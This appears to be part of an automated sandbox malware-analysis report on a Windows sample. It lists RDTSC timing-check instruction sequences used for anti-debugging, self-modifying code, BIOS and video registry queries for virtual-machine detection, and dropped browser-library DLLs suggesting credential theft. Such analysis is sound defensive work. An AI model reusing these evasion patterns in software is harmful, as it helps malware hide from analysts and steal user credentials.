Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBC74 second address: BDBC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8FCD64876h 0x0000000a jmp 00007FB8FCD6487Ah 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB8FCD6487Ah 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBC9F second address: BDBCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE1E second address: BDBE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE26 second address: BDBE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE31 second address: BDBE50 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCD64887h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE50 second address: BDBE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBF98 second address: BDBF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBF9C second address: BDBFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C9h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5E04 second address: BE5E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4A64 second address: BE4A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007FB8FCCA77B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4A72 second address: BE4A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D5D second address: BE4D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D63 second address: BE4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD64886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D7F second address: BE4D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FB8FCCA77B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D8E second address: BE4D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D94 second address: BE4DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3BFE second address: BE3C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9DC7 second address: BE9DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED23D second address: BED299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64887h 0x00000007 jmp 00007FB8FCD64888h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FB8FCD64888h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB8FCD6487Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED299 second address: BED2A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3972 second address: BF3977 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324DD second address: B324EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FB8FCCA77B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324EA second address: B324F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324F0 second address: B32509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B32509 second address: B3250D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3250D second address: B3251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3251A second address: B3251E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA620 second address: BFA624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA624 second address: BFA63D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Bh 0x00000007 jmp 00007FB8FCD6487Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA63D second address: BFA643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA643 second address: BFA647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFEA78 second address: BFEA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE4E4 second address: BFE55C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8FCD64878h 0x00000008 pushad 0x00000009 jbe 00007FB8FCD64876h 0x0000000f jnp 00007FB8FCD64876h 0x00000015 jmp 00007FB8FCD64882h 0x0000001a je 00007FB8FCD64876h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007FB8FCD64882h 0x0000002d jbe 00007FB8FCD64876h 0x00000033 jl 00007FB8FCD64876h 0x00000039 popad 0x0000003a jng 00007FB8FCD64892h 0x00000040 jmp 00007FB8FCD64886h 0x00000045 jnp 00007FB8FCD64876h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6C4 second address: BFE6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01A98 second address: C01AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8FCD64876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AA4 second address: C01ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FB8FCCA77B6h 0x0000000e jbe 00007FB8FCCA77B6h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01ABC second address: C01ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB8FCD64876h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01ACD second address: C01AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AD3 second address: C01AD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AD9 second address: C01AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FB8FCCA77BEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C015FD second address: C01612 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FB8FCD6487Bh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01612 second address: C01629 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8FCCA77BCh 0x00000008 pushad 0x00000009 jns 00007FB8FCCA77B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0178D second address: C01793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EAFD second address: C0EB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EB07 second address: C0EB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EB0C second address: C0EB32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FB8FCCA77B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007FB8FCCA77B6h 0x00000013 jmp 00007FB8FCCA77BFh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E989 second address: C0E9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8FCD64880h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E9A3 second address: C0E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C100FA second address: C1010F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1010F second address: C10115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C183A1 second address: C183B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8FCD6487Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C183B5 second address: C183B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C195FD second address: C19603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C19603 second address: C19608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D1F5 second address: C1D25E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB8FCD6487Bh 0x00000008 jmp 00007FB8FCD64881h 0x0000000d pop edi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jp 00007FB8FCD64876h 0x0000001f jmp 00007FB8FCD64887h 0x00000024 popad 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FB8FCD6487Dh 0x0000002f jmp 00007FB8FCD6487Dh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36679 second address: C3667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C37DB0 second address: C37DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8FCD6487Bh 0x0000000b popad 0x0000000c jbe 00007FB8FCD6487Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C39762 second address: C39775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FB8FCCA77B6h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C4C6 second address: C3C4E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FB8FCD6487Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C03E second address: C3C04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C04C second address: C3C058 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C058 second address: C3C060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B634 second address: C4B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B639 second address: C4B64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7D2 second address: C4B7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7DB second address: C4B7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7E5 second address: C4B7ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7ED second address: C4B7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B7F5 second address: C4B7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D418 second address: C4D421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D421 second address: C4D425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D425 second address: C4D429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3CD second address: B2D3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3D1 second address: B2D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2D3DA second address: B2D3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FCFA second address: C4FCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FEDD second address: C4FEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FEE8 second address: C4FEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFA9 second address: C4FFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8FCD64876h 0x0000000a popad 0x0000000b jbe 00007FB8FCD64878h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FB8FCD6487Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jnl 00007FB8FCD64878h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB8FCD64883h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4FFEB second address: C4FFFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C517E5 second address: C517E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C537CB second address: C537CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52902DC second address: 5290353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 00649B47h 0x00000008 pushfd 0x00000009 jmp 00007FB8FCD6487Ch 0x0000000e add cx, 59F8h 0x00000013 jmp 00007FB8FCD6487Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov cl, dl 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FB8FCD6487Dh 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov eax, 42B5F0B3h 0x0000002e jmp 00007FB8FCD64888h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB8FCD64887h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73182 second address: B7318C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7318C second address: B73193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B73323 second address: B73327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A73 second address: 5290A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A79 second address: 5290A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290A7D second address: 5290AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FB8FCD64880h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB8FCD64887h 0x00000017 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe

Special instruction interceptor: First address: 9C1943 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

